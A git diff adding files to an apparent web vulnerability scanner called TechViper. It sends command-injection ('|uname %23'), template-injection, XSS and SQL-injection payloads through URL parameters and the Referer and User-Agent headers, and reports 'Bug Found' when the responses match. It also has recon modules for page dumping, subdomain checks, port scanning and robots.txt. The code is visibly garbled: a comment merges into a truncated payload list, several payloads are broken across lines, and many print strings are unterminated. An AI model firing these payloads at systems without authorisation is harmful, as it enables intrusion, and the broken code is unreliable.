+ j=url.replace('*',payload.strip())
+ print (f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (RCE)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Exploit : {j}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from RCE With GET Method')
+ else:
+ x = 0
+ for params in url.split("?")[1].split("&"):
+ payloads=["|uname %23","'|uname %23",'"|uname %23']
+ for payload in payloads:
+ for h in range(deco):
+ payload=urlencoder(payload)
+ sleep(slp)
+ r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent,one=True)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ j=url.replace(params, params + str(payload).strip())
+ print (f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (RCE)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Param : {params}
+{bold}{info}{bold} Exploit : {j}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from RCE With GET Method')
+ def ssti(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ logger.info('Scanning from SSTI With GET Method')
+ if '*' in url:
+ logger.info('replacing (*) from url to payload')
+ x = 0
+ payloads=['{{ 6*6 }}','<%= 6 * 6 %>','${6*6}']
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ te=requests.get(url.replace('*',''),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ fir = re.findall('36'.encode('utf-8'),te.content)
+ for payload in payloads:
+ for h in range(deco):
+ payload=urlencoder(payload)
+ sleep(slp)
+ r=requests.get(url.replace('*',str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ j=url.replace('*',str(payload).strip())
+ print (f"""
+{bold}{good}{bold} Bug Found : Template Injection
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Exploit : {j}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from SSTI With GET Method')
+ elif '*' not in url:
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ x = 0
+ te=requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ fir = re.findall('36'.encode('utf-8'),te.content)
+ for params in url.split("?")[1].split("&"):
+ payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}']
+ for payload in payloads:
+ for h in range(deco):
+ payload=urlencoder(payload)
+ sleep(slp)
+ r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ j=url.replace(params, params + str(payload).strip())
+ print (f"""
+{bold}{good}{bold} Bug Found : Template Injection
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Param : {params}
+{bold}{info}{bold} Exploit : {j}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from SSTI With GET Method')
+class webscraper: # web scraper modules .. coming soon ^_^
+ def __init__(self):
+ pass
+ def geturls(self,url):
+ pass # This module Bulid To Dump All urls in page EX : (",'"Hacked by Err0r_HB "',"'> "]
+ for payload in payloads:
+ if method == 'get':
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ if payload.encode("utf-8") in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}{bold}GET{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ elif payload.encode("utf-8") in r2.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}{bold}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}""")
+ break
+ else:
+ continue
+ else:
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{url} {payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ else:
+ continue
+ def referrer_sqli(url,cagent=None,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,proxy=None,slp=0,batch=None):
+ payload=''''"'''
+ if method == 'get':
+ sleep(slp)
+ rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ for d,e in errors.items():
+ cch = re.findall(e.encode('utf-8'),rr.content)
+ cch2 = re.findall(e.encode('utf-8'),rr2.content)
+ ch = re.findall(e.encode('utf-8'),r.content)
+ ch2 = re.findall(e.encode('utf-8'),r2.content)
+ if len(cch) < len(ch):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ elif len(cch2) < len(ch2):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ else:
+ continue
+ else:
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ for d,e in errors.items():
+ cch = re.findall(e.encode('utf-8'),r2.content)
+ ch = re.findall(e.encode('utf-8'),r.content)
+ if len(cch) < len(ch):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ else:
+ continue
+ def referrer_rce(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None):
+ payloads = ["'|uname %23",'"|uname %23',"|uname %23"]
+ for payload in payloads:
+ if method == 'get':
+ sleep(slp)
+ rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ cch = re.findall("Linux".encode('utf-8'),rr.content)
+ cch2 = re.findall("Linux".encode("utf-8"),rr2.content)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ ch2 = re.findall("Linux".encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ elif len(ch2) > len(cch2):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ else:
+ sleep(slp)
+ r2 = requests.post(url,headers={'User-agent':uagent(cagent=cagent,one=True)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.post(url,headers={'User-agent':uagent(cagent=cagent,one=True),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ ch = re.findall("Linux".encode("utf-8"),r.content)
+ cch = re.findall("Linux".encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ def referrer_ssti(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None):
+ payloads=['{{ 6*6 }}','<%= 6 * 6 %>','${6*6}']
+ for payload in payloads:
+ if method == 'get':
+ sleep(slp)
+ rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ cch = re.findall("36".encode('utf-8'),rr.content)
+ cch2 = re.findall("36".encode("utf-8"),rr2.content)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ ch2 = re.findall("36".encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print (f"""
+{bold}{good}{bold} Bug Found : Template Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{yellow}{bold}GET{end}{bold}]
+{bold}{info}{bold} URL : {url}{end}
+ break
+ elif len(ch2) > len(cch2):
+ print (f"""
+{bold}{good}{bold} Bug Found : Template Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{yellow}{bold}POST{end}{bold}]
+{bold}{info}{bold} URL : {url}{end}
+ break
+ else:
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent),"referrer":f"{payload}"},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ ch = re.findall("Linux".encode("utf-8"),r.content)
+ cch = re.findall("Linux".encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print (f"""
+{bold}{good}{bold} Bug Found : Template Injection (in referrer header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{yellow}{bold}POST{end}{bold}]
+{bold}{info}{bold} URL : {url}{end}
+ break
+ def user_agent_xss(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None):
+ payloads=['"Hacked by Err0r_HB "','"> TechViper','">MOVE HERE
','">','">',' ',"'> "]
+ for payload in payloads:
+ if method == 'get':
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ elif payload.encode('utf-8') in r2.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ else:
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ def user_agent_sqli(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None):
+ payload='"'
+ if method == 'get':
+ sleep(slp)
+ rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,proxies=proxy,cookies=cookie)
+ for d,e in errors.items():
+ cch = re.findall(e.encode('utf-8'),rr.content)
+ cch2 = re.findall(e.encode("utf-8"),rr2.content)
+ ch = re.findall(e.encode('utf-8'),r.content)
+ ch2 = re.findall(e.encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ elif len(ch2) > len(cch2):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ else:
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ for d,e in errors.items():
+ ch = re.findall(e.encode("utf-8"),r.content)
+ cch = re.findall(e.encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} Error : {e}
+{bold}{info}{bold} URL : {r.url}{end}
+ break
+ def user_agent_rce(url,timeo=None,cookie=None,redir=None,deco=None,vert=None,method=None,date=None,cagent=None,proxy=None,slp=0,batch=None):
+ payloads = ["'|uname %23",'"|uname %23',"|uname %23"]
+ for payload in payloads:
+ if method == 'get':
+ sleep(slp)
+ rr = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ rr2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.get(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ cch = re.findall('Linux'.encode('utf-8'),rr.content)
+ cch2 = re.findall('Linux'.encode("utf-8"),rr2.content)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ ch2 = re.findall('Linux'.encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}GET{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ elif len(ch2) > len(cch2):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
+ else:
+ sleep(slp)
+ r2 = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ sleep(slp)
+ r = requests.post(url,headers={"User-agent":uagent(cagent=cagent,one=True,payload=payload)},data=date,timeout=timeo,verify=vert,allow_redirects=redir,cookies=cookie,proxies=proxy)
+ ch = re.findall('Linux'.encode("utf-8"),r.content)
+ cch = re.findall('Linux'.encode("utf-8"),r2.content)
+ if len(ch) > len(cch):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (in User-agent header)
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Method : [{end}{yellow}POST{end}{bold}]
+{bold}{info}{bold} URL : {r.url}{end}
diff --git a/core/updater.py b/core/updater.py
new file mode 100644
index 0000000..7974efb
--- /dev/null
+++ b/core/updater.py
@@ -0,0 +1,39 @@
+import os
+import re
+from requests import get
+from core.config import changes
+from core.colors import run, que, good, info, end, green
+from core.log import setup_logger
+logger = setup_logger(__name__)
+def updater():
+ logger.run('Checking for updates')
+ latestCommit = get(
+ 'https://raw.githubusercontent.com/Malwareman007/TechViper/main/core/config.py').text
+ if changes not in latestCommit: # just a hack to see if a new version is available
+ changelog = re.search(r"changes = '''(.*?)'''", latestCommit)
+ changelog = changelog.group(1).split(
+ ';') # splitting the changes to form a list
+ logger.good('A new version of TechViper is available.')
+ changes_str = 'Changes:\n'
+ for change in changelog: # prepare changes to print
+ changes_str += '%s>%s %s\n' % (green, end, change)
+ logger.info(changes_str)
+ currentPath = os.getcwd().split('/') # if you know it, you know it
+ folder = currentPath[-1] # current directory name
+ path = '/'.join(currentPath) # current directory path
+ choice = input('%s Would you like to update? [Y/n] ' % que).lower()
+ if choice != 'n':
+ logger.run('Updating Malwareman007')
+ os.system(
+ 'git clone --quiet https://github.com/Malwareman007/TechViper %s' % (folder))
+ os.system('cp -r %s/%s/* %s && rm -r %s/%s/ 2>/dev/null' %
+ (path, folder, path, path, folder))
+ logger.good('Update successful!')
+ else:
+ logger.good('TechViper is up to date!')
diff --git a/modules/__init__.py b/modules/__init__.py
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/modules/__init__.py
@@ -0,0 +1 @@
diff --git a/modules/dumper.py b/modules/dumper.py
new file mode 100644
index 0000000..9840d64
--- /dev/null
+++ b/modules/dumper.py
@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+from modules.techviper import Module,colors,thetime
+def data(): # The all data of module
+ data = {
+ 'name': 'Dumper',
+ 'description':'''
+Dump Everything in website (img , links , js , etc ..)
+ ''',
+ 'date':'18-06-2023',
+ 'license':'MIT',
+ 'authors':[
+ 'Malwareman007'],
+ 'emails':[
+ 'Malwareman007@gmail.com'],
+ 'list_support': True,
+ 'options':[
+ 'url',
+ 'threads',
+ 'timeout'
+ ]
+ }
+ return data
+class script:
+ def __init__(self):
+ pass
+ def run(self,options):
+ import requests
+ from bs4 import BeautifulSoup
+ f = options['file']
+ for url in f:
+ if url.startswith('http://') or url.startswith('https://'):
+ pass
+ else:
+ url = f'http://{url}'
+ print(f"{colors().info} [ {url.strip()} ]")
+ base_url = url.strip()
+ try:
+ r = requests.get(base_url,verify=False,timeout=options['timeout'])
+ soup = BeautifulSoup(r.text)
+ l = {
+ 'img':'src',
+ 'script':'src',
+ 'link':'href',
+ 'a':'href',
+ 'input':'name',
+ }
+ for tag,ty in l.items():
+ print(f'\n\n{colors().red}+={colors().yellow}------{base_url}--[{tag}]----------{colors().red}=+{colors().end}')
+ for src in soup.find_all(tag):
+ try:
+ print(src[ty])
+ except:
+ continue
+ print(f'{colors().red}#{colors().yellow}----------------------{colors().red}#{colors().end}')
+ except:
+ pass
diff --git a/modules/httpre.py b/modules/httpre.py
new file mode 100644
index 0000000..e1d682c
--- /dev/null
+++ b/modules/httpre.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python3
+from modules.techviper import Module,colors,thetime
+def data(): # The all data of module
+ data = {
+ 'name': 'httpre',
+ 'description':'''
+Get a live subdomains
+ ''',
+ 'date':'18-06-2023',
+ 'license':'MIT',
+ 'authors':[
+ 'Malwareman007'],
+ 'emails':[
+ 'Malwareman007@protonmail.com'],
+ 'list_support': True,
+ 'options':[
+ 'url',
+ 'threads',
+ 'timeout'
+ ]
+ }
+ return data
+class script:
+ def __init__(self):
+ global q
+ from queue import Queue
+ q = Queue()
+ def threader():
+ item = q.get()
+ script.opener(item)
+ q.task_done()
+ def opener(domain):
+ import requests
+ try:
+ r = requests.get(f'http://{domain.strip()}',timeout=timeout,verify=False,allow_redirects=False)
+ print(f'{colors().good} Live : {domain.strip()}')
+ f = open(name,'a')
+ f.write(f'\nhttp://{domain.strip()}')
+ f.close()
+ except:
+ print(f'{colors().bad} {domain.strip()}')
+ def run(self,options):
+ global timeout,name
+ import os
+ name = f'{os.getcwd()}/TecchViper_done_{thetime(t="yes").second}_{thetime(t="yes").minute}.txt'
+ timeout = options['timeout']
+ from threading import Thread
+ for thr in range(options['threads']):
+ p1 = Thread(target=script.threader)
+ p1.daemon = True
+ p1.start()
+ for url in options['file']:
+ q.put(url.strip())
+ q.join()
diff --git a/modules/nmaper.py b/modules/nmaper.py
new file mode 100644
index 0000000..c7418c0
--- /dev/null
+++ b/modules/nmaper.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python3
+from modules.techviper import Module,colors
+def data(): # The all data of module
+ data = {
+ 'name': 'port scanning',
+ 'description':'''
+Make Port scanning processe using Hackertarget api
+With This module you can scan all hosts using NMAP Tool Online
+ ''',
+ 'date':'18-06-2023',
+ 'license':'MIT',
+ 'authors':[
+ 'Malwareman007'],
+ 'emails':[
+ 'Malwareman007@protonmail.com'],
+ 'list_support': False,
+ 'options':[
+ 'url'
+ ]
+ }
+ return data
+class script:
+ def __init__(self):
+ pass
+ def run(self,options):
+ import requests
+ r = requests.get('https://api.hackertarget.com/nmap/?q='+options['url'].split('/')[2])
+ print(r.text)
diff --git a/modules/robot.py b/modules/robot.py
new file mode 100644
index 0000000..4f4287b
--- /dev/null
+++ b/modules/robot.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from modules.techviper import Module,colors,thetime
+def data(): # The all data of module
+ data = {
+ 'name': 'Robot Man',
+ 'description':'''
+Find Robots File
+ ''',
+ 'date':'18-06-2023',
+ 'license':'MIT',
+ 'authors':[
+ 'Malwareman007'],
+ 'emails':[
+ 'Malwareman007@protonmail.com'],
+ 'list_support': True,
+ 'options':[
+ 'url',
+ 'threads',
+ 'timeout'
+ ]
+ }
+ return data
+class script:
+ def __init__(self):
+ global q
+ from queue import Queue
+ q = Queue()
+ def threader():
+ item = q.get()
+ script.opener(item)
+ q.task_done()
+ def opener(domain):
+ import requests
+ try:
+ if domain.strip().endswith('/'):
+ ro = 'robots.txt'
+ else:
+ ro = '/robots.txt'
+ r = requests.get(f'{domain.strip()}{ro}',timeout=timeout,verify=False,allow_redirects=False)
+ if r.status_code == 200:
+ print(f'{colors().good} Found : {r.url}')
+ print(r.text)
+ print('\n----------------------------\n')
+ except:
+ pass
+# print(f'{colors().bad} {domain.strip()}')
+ def run(self,options):
+ global timeout,name
+ import os
+ timeout = options['timeout']
+ from threading import Thread
+ for thr in range(options['threads']):
+ p1 = Thread(target=script.threader)
+ p1.daemon = True
+ p1.start()
+ for url in options['file']:
+ q.put(url.strip())
+ q.join()
\ No newline at end of file
diff --git a/modules/techviper.py b/modules/techviper.py
new file mode 100644
index 0000000..918f530
--- /dev/null
+++ b/modules/techviper.py
@@ -0,0 +1,65 @@
+__author__ = 'Malwareman007'
+__version__ = '1.0'
+__github__ = 'https://github.com/Malwareman/TechViper'
+__email__ = 'malwareman007@protonmail.com'
+__blog__ = 'https://techviper.webwatcher.tech/'
+import importlib
+import sys
+import os
+import platform
+from datetime import datetime
+class colors:
+ def __init__(self):
+ colors = True
+ machine = sys.platform # Detecting the os of current system
+ checkplatform = platform.platform() # Get current version of OS
+ if machine.lower().startswith(('os', 'win', 'darwin', 'ios')):
+ colors = False # Colors shouldn't be displayed in mac & windows
+ if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586:
+ colors = True
+ os.system('') # Enables the ANSI
+ if not colors:
+ end = red = white = green = yellow = run = bad = good = bold = info = que = ''
+ else:
+ self.white = '\033[97m'
+ self.green = '\033[92m'
+ self.red = '\033[91m'
+ self.yellow = '\033[93m'
+ self.end = '\033[0m'
+ self.back = '\033[7;91m'
+ self.bold = '\033[1m'
+ self.blue = '\033[94m'
+ self.info = '\033[93m[!]\033[0m'
+ self.que = '\033[94m[?]\033[0m'
+ self.bad = '\033[91m[-]\033[0m'
+ self.good = '\033[92m[+]\033[0m'
+ self.run = '\033[97m[~]\033[0m'
+ self.grey = '\033[7;90m'
+def thetime(t=None):
+ now = datetime.now()
+ if t:
+ return now
+ return f'{colors().bold}{colors().blue}[{colors().end}{colors().bold}{now.hour}:{now.minute}:{now.second}{colors().blue}{colors().bold}]{colors().end}'
+class Module:
+ def __init__():
+ pass
+ def printer(what,msg):
+ if what.lower() == 'information':
+ print(thetime()+f' {colors().bold}[{colors().green}INFO{colors().end}] {msg}{colors().end}')
+ elif what.lower() == 'error':
+ print(thetime()+f' {colors().bold}[\033[91m{colors().bold}CRITICAL{colors().end}] {colors().bold}{msg}{colors().end}')
+ elif what.lower() == 'warring':
+ print(thetime()+f' {colors().bold}[{colors().yellow}{colors().bold}WARRING{colors().end}] {colors().bold}{msg}{colors().end}')
+ elif what.lower() == 'question':
+ p = input(msg)
+ if p[0].lower() == 'y' or p[0] == '':
+ pass
+ else:
+ exit()
+ def load_modules(module):
+ Module.printer('info',f'Loading {module} Module')
+ module = 'modules.'+module.replace('.py','').replace('/','.')
+ c = importlib.import_module(module)
+ return c